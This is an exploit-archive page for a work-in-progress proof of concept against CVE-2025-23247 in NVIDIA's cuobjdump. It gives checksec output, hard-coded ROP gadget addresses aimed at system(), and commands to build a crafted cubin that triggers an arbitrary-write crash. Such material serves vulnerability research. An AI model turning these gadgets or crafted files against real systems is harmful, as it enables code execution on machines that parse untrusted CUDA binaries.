CVE-2025-23247 PoC — NVIDIA CUDA toolkit 安全漏洞

Source

Associated Vulnerability

Description

wip for CVE-2025-23247 . ATM just crash PoC which shows we control buffer and offset, so we got aaw 

Readme

# CVE-2025-23247
Epic Collab with @reubensammut :) as alaways :)
wip for CVE-2025-23247 . ATM just crash PoC which shows we control buffer and offset, so we got aaw. 
Bug from https://talosintelligence.com/vulnerability_reports/TALOS-2025-2151

checksec ./cuobjdump
[*] '/home/vlad/cuobjdump'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)

Anyways we get no PIE so

uint64_t system_plt = 0x401d90;
uint64_t pop_rdi_ret = 0x402d1b;
uint64_t ret_gadget = 0x402d1c;  // Just a ret

Crashpoint
![Screenshot_from_2025-11-20_16-00-41 png-2](https://github.com/user-attachments/assets/0e319b6d-2444-4e22-9479-35e976692a38)

gcc -o modify_simple modify_simple.c
vlad@Vlad-PC:~$ ./modify_simple simple.cubin modified_simple2.cubin
Created modified_simple2.cubin with vulnerable .nv_debug_source section
Run: ./cuobjdump --dump-elf modified_simple2.cubin

And for the cuda kernel

nvcc -ptx simple.cu -o simple.ptx
nvcc -cubin simple.ptx -o simple.cubin --generate-line-info
or
nvcc -cubin simple.cu -o simple.cubin --generate-line-info 

File Snapshot

 [4.0K]  /data/pocs/8aae502ef489f69646a21af58f24fd46c7b8d058
├── [4.0K]  modify_simple.c
├── [1.1K]  README.md
└── [ 168]  simple.cu

1 directory, 3 files

Remarks